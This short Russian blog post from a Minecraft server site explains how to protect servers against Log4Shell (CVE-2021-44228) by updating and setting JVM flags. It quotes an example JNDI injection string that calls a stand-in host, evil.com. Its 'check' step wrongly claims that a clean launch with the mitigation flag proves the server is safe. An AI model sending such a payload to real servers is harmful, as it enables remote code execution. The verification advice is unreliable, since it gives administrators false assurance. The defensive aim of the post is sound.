Добро пожаловать на Craft‑Bukkit

Всё о Minecraft серверах: гайды, команды, скачивание сборок и полезные советы для администраторов и игроков.

Как защитить сервер Minecraft от уязвимости Log4Shell (CVE-2021-44228)

Security_guard 07.09.2026 18:03 20
Объяснение и защита от критической уязвимости Log4Shell (CVE-2021-44228) на серверах Minecraft. Обновление и временные меры.

Как защитить сервер Minecraft от уязвимости Log4Shell (CVE-2021-44228)

Log4Shell — это критическая уязвимость в библиотеке Log4j, которая позволяла хакерам выполнять произвольный код на сервере. Хотя патчи вышли, некоторые старые сборки всё ещё уязвимы.

Что такое Log4Shell?

Уязвимость позволяла злоумышленнику отправить в чат строку вида ${jndi:ldap://evil.com/exploit} и получить удалённый доступ к серверу.

Проверка уязвимости

Войдите в консоль сервера и выполните:

java -Dlog4j2.formatMsgNoLookups=true -jar server.jar

Если сервер запускается без ошибок — вы в безопасности.

Защита

Обновите ядро сервера до версии, где исправлена уязвимость (Paper 1.18.2+, Spigot 1.18.2+).

Если обновление невозможно, добавьте в скрипт запуска:

-Dlog4j2.formatMsgNoLookups=true
-Dlog4j2.configurationFile=log4j2.xml

И настройте log4j2.xml, отключив JNDI Lookups.

🖥️
Хостинг для сервера Minecraft
Подробнее об услугах и тарифах вы можете узнать на сайте
Перейти на сайт →
← К списку статей

💬 Комментарии (0)

⏳ Все комментарии проходят модерацию

🔒 Войдите, чтобы оставить комментарий

😊 Пока нет комментариев. Будьте первым!